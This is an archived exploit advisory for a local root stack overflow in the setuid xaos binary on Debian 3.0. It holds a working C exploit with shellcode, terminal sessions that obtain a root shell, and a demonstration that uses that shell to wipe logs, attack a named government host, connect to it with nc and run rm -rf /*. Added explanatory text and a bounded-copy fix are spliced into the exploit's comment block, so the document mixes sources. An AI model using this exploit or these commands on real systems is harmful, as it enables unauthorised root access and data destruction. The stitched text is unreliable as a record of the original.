TUCoPS :: Linux :: Debian :: debroot.txt

Debian Local Root Exploit




bazarr!

Attachment: bazarr-episode-4.c

/* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 woody */
/* by: bazarr */
/* bazarr@ziplip.com */
/* bazarr episode #4

*hendy* i dont build nests for da winter, cause i dont have no time for building nests

dis is da advisory and xploit at da same time for a local root hole in debian 3.0.
if dave censor dis he out of his mind! dis my second local root xploit in a week!
when bugtraq be heading down south to county jail quick wid all da cross site scripting bugs
and advisorys for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets be real about dis
advisorys for non popular software are a dime a dozen. i da first young boy to come around
wid real advisorys in many a months. so please gimmie small break.

i release more advisorys den combined times dvdfairy has DoS'd phrack.ru

dats alot!

--- You have been kicked from #openbsd by Dianora
(I have been coding before you were even a glint in your fathers eye. go away)

dianora when i finish "da design and implementation of da 4.4bsd operating system" (A BOOK)
i be back to challenge you on bsd kernel , den you have no choice but to let me stay and give me +v in #openbsd.
thank you. (she kicked young 16 year old boy out of channel for xposing remote hole in default install!)

ok lets take a look at the vendor info for xaos:

DESCRIPTION
    XaoS is a protable real-time interactive fractal zoomer/morpher. UNIX version works under X11, SVGA and text terminals. If you don't knwo what fractal is or you want to know more about XaoS features you should see animated tutorial. Run XaoS and press 'H' twice. It is much more fun than reading of boring manual page :) and it supports foregin languages. You might also read xaos.info file for some advanced stuff (like how to write animations and tutorials manually, port or extend XaoS, algorithms used etc.)

first thing dat i spot is spelling mistake please patch 'knwo' into 'no' asap.

so we know dat xaos is a program which you zoom around in when you get real stoned(seriously).
lets get to da local root hole in xaos.

lets take a look at my terminal session wid xaos:

c00l@debian:~/code/dump% ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% #well it aint here so lemme get back to da irc
c00l@debian:~/code/dump% #wait a second! i got an idea
c00l@debian:~/code/dump% ls -al /usr/bin/xaos
-rwsr-xr-x 1 root root 379324 Apr 3 2001 /usr/bin/xaos
c00l@debian:~/code/dump% #suid root?! dat mean if it xploited it will result in uid = 0
c00l@debian:~/code/dump% #what will i do now?

now what i be doin is dis , bare wid me here fellow security researches (lcamtuf you able to keep up wid dis?)
lets keep going into dis adventure, lets check if you be vulnerable

c00l@debian:~/code/dump% #ok now we be checking if dis xaos is vulnerable to 0day bug which i have discovered
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x2049'`
^C
c00l@debian:~/code/dump% #ok im not vulnerable i guess
c00l@debian:~/code/dump% #w8 i have an idea!
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
Segmentation fault
c00l@debian:~/code/dump% #aww crap i be vulnerable , what now?


after auditing for many a days and many a nights to find dis bug i am still weary from all of it.
so lemme try and keep on going through dis adventure wid xaos, lets try and xploit it dis time.

c00l@debian:~/code/dump% ./set #dis put shellcode in environment with many a 0x90 around it
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display A
Segmentation fault
[c00l:dump]$ #its not xploitable i guess
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAAA
sh-2.05a# id ; uname -a
uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT
sh-2.05a# exit
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit , thanks!

woa dis be going too fast for some security researchers let me slow down and xplain dis.

xaos be doing something like dis wid its -language argument

++++++++
char hoolio[4096]; //big as to not allow stack overflow

strcpy(hoolio,argv[i]); //secure
++++++++

but it is NOT secure , an attacker is able to overflow 'hoolio' wid his own data!
den he overwrite da saved return address on da stack with his own and den he execute a shell.
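To make the point concrete, here is an added example that is not XaoS source and not bazarr's code: the unbounded strcpy() pattern described above, next to a bounded replacement and an early privilege drop. Only the 4096-byte buffer and the -language option come from the advisory; the function names, the 20049-byte test input and the privilege-drop helper are assumptions made for the illustration. It also explains the two probes in the session: 2049 bytes fits inside a 4096-byte buffer, so nothing happens, while 20049 bytes runs roughly 16000 bytes past its end and through the saved return address.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define LANG_MAX 4096   /* buffer size named in the advisory */

/* The pattern the advisory describes: fixed stack buffer, unbounded strcpy().
 * A 2049-byte argument fits; a 20049-byte one runs ~16000 bytes past the end,
 * through the saved return address. Kept only for comparison; never call it. */
void set_language_unsafe(const char *arg)
{
    char lang[LANG_MAX];
    strcpy(lang, arg);                       /* no length check at all */
    printf("language: %s\n", lang);
}

/* Bounded replacement: refuse anything that does not fit, NUL included.
 * Returns 0 on success, -1 if the argument is too long. */
int copy_language(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* For a setuid-root binary the overflow is only a root hole because euid is
 * still 0 while argv is parsed. Hand the privilege back before touching any
 * user-controlled input (assumed helper, not from XaoS). Returns 0 when the
 * effective ids match the real ids afterwards. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}

/* Constructed input (not from the page): a 20049-byte argument like the one
 * that crashed xaos in the session. Returns 0 if the bounded copy rejects it
 * and still accepts a normal value. */
int demo_overlong_argument(void)
{
    char lang[LANG_MAX];
    size_t big = 20049;
    char *arg = malloc(big + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', big);
    arg[big] = '\0';

    int rejected = copy_language(lang, sizeof lang, arg);   /* expect -1 */
    int accepted = copy_language(lang, sizeof lang, "en");  /* expect 0 */
    free(arg);

    if (rejected != -1 || accepted != 0 || strcmp(lang, "en") != 0)
        return 1;
    return 0;
}

int main(int argc, char **argv)
{
    char lang[LANG_MAX];

    if (drop_privileges() != 0) {
        perror("drop_privileges");
        return 2;
    }
    if (argc > 1) {
        if (copy_language(lang, sizeof lang, argv[1]) != 0) {
            fprintf(stderr, "-language: argument too long (max %d bytes)\n", LANG_MAX - 1);
            return 1;
        }
        printf("language: %s\n", lang);
    }
    return demo_overlong_argument();
}
```

For an administrator who cannot wait for a fixed package, the workaround that follows from the session above is to take the setuid bit off with `chmod u-s /usr/bin/xaos`: the overflow is then only a crash as the invoking user, at the cost of the SVGA console mode that needed root in the first place.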

-------------
ENDING

xaos is vulnerable to a stack buffer overflow which be yielding root privileges on debian 3.0 (w00dy)

-------------
PATCH

see many a people dont understand dis issue, i am young highschool boy
doing many a bleeding edge freelance security work for free , it not my job to provide patch
and pamper you. but if you really dont want to get hacked with many a 0day xploits just dont go online
and dont make fun of caddis cuz he be xploiting your ftpd in record time to rm you(seriously man).

-------------
VENDORS NOTIFIED

none

-------------
VENDORS VULNERABLE

debian 3.0 & unstable on default install!!!
FreeBSD x.x ports!
OpenBSD x.x ports!
NetBSD x.x ports!!!
anyone who installed xaos!

-------------
XPLOIT

as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz
i have trouble programming after last nights crystal meth ride.

demonstration:

[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=1003(pan) gid=1003(pan) euid=0(root) groups=1003(pan)
sh-2.05a# rm -rf /var/log
sh-2.05a# cc b.c
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b
.... ..... .... .... .... ....
done.
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit

just compile and run!!! so user friendly its not even funny!
the 'a's are stack padding for da xaos , try 1-4 'a's
woa hey i just made a fool of myself! i dident need any stack padding there.

dis C-code is very complex , do not attempt to modify it.

it is very user friendly though for da following groups:

1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researches to make money off highschool boy by using dis xploit on der clients and charging dem for it
4. elite lurking blackhat laughing at my codez! (I CANT SAY I LIKE DIS GROUP ALL DAT MUCH)

AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* x86 Linux shellcode: setuid(0); execve("/bin//sh", ["/bin//sh"], NULL) */
char c[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

int main(int cc, char **a) {
    char x[256]; char b[72001]; /* sled + shellcode, plus one byte for the terminating NUL (the original wrote the NUL one past the end of b) */
    memset(b, 0x99, sizeof(b) - 1); memcpy(b + 71968, c, strlen(c)); b[sizeof(b) - 1] = 0; /* 0x99 = cdq, a harmless one-byte sled filler */
    setenv("C", b, 1); /* payload reaches xaos through its environment */
    if (!a[1]) { printf("[*] bazarr :(\n"); exit(1); }
    /* 8096 copies of the guessed return address overflow the -language buffer; note the third byte here is \xfe where the session above used \xff. a[1] is the -display padding */
    snprintf(x, sizeof(x), "/usr/bin/xaos -language `perl -e 'print \"\x45\xfe\xfe\xbf\"x8096'` -display %s", a[1]);
    printf("[*] bazarr :)\n"); system(x);
}

/*


-------------
ADVANCE WARNING=20

double free() bug in popular suid root application installed by default on debian 3.0 coming soon!
remote xploit for debian application coming soon!

and so many more i cannot even list dem all(SERIOUSLY).

16 year old boy release more bugs in few weeks den your whole crew does in da last 5 years!
i think most of you be a little bitter about dat and dats why some of you be anti bazarr.
your company should stick to hoolio's ftpd server.

-------------
GREETS

sir hackalot - you cool man! you like the 2pac of hacking. what ever happened to you and PHAZE? it been awhile!

-------------
BYE

bye bye guys i gotta go feed the dog and work on math homework.

bye.

-bazarr


*/













